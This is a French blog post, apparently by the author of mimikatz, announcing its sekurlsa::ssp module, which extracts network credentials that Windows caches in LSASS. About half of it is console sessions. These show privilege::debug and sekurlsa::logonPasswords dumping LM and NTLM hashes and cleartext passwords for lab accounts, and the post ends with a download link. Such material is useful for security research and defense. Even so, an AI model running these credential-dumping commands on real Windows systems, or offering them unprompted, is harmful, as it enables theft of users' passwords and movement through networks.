Après un petit passage dans le monde des mots de passe enregistrés, retournons voir une catégorie sous estimées : les mots de passes réseau…
Ces mots de passes sont souvent conseillés, car il n’y a pas d’ouverture de session interactive sur le serveur cible lors d’une connexion à un partage réseau, un canal nommé, ou une autre ressource « simple » à distance.
L’authentification est la plupart du temps transparente, et basée sur la session courante de l’utilisateur, via SSO.
Toutefois, lors d’accès à des ressources de plus haut niveau, ou nécessitant l’utilisation d’un compte tiers, le SSO ne peut plus rien pour nous : il faut s’authentifier avec de nouvelles données d’identification.
Exemple d’accès à un partage avec des données d’identification explicites
mimikatz # privilege::debug Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK mimikatz # sekurlsa::logonPasswords full Authentification Id : 0;2586685 Package d'authentification : NTLM Utilisateur principal : Gentil Kiwi Domaine d'authentification : windows-08 msv1_0 * Utilisateur : Gentil Kiwi * Domaine : windows-08 * Hash LM : d0e9aee149655a6075e4540af1f22d3b * Hash NTLM : cc36cf7a8514893efccd332446158b1a kerberos * Utilisateur : Gentil Kiwi * Domaine : windows-08 * Mot de passe : waza1234/ ssp * [0] Utilisateur : gentiltest Domaine : WINDOWS-08 Mot de passe : wazatest1234/ * [1] Utilisateur : test Domaine : WINDOWS-08 Mot de passe : test1234 wdigest * Utilisateur : Gentil Kiwi * Domaine : windows-08 * Mot de passe : waza1234/ tspkg * Utilisateur : Gentil Kiwi * Domaine : windows-08 * Mot de passe : waza1234/ livessp n.t. (LUID KO)
Ou en plus court :
mimikatz # sekurlsa::ssp Authentification Id : 0;2586685 Package d'authentification : NTLM Utilisateur principal : Gentil Kiwi Domaine d'authentification : windows-08 ssp : [0] { gentiltest ; WINDOWS-08 ; wazatest1234/ } [1] { test ; WINDOWS-08 ; test1234 }
Dans ces deux exemples, le domaine d’authentification n’a pas d’importance, il s’agit de comptes locaux.
Explication rapide
Notre processus habituel, LSASS
, tient encore une fois une table de données d’identification que des processus, providers, ou pilotes, peuvent interroger pour établir des connexions.
C’est pourquoi le module SSP fait son apparition !
La version prenant en charge cette amélioration est disponible : http://blog.gentilkiwi.com/mimikatz
Hack the planet!
Seriously though, great work :)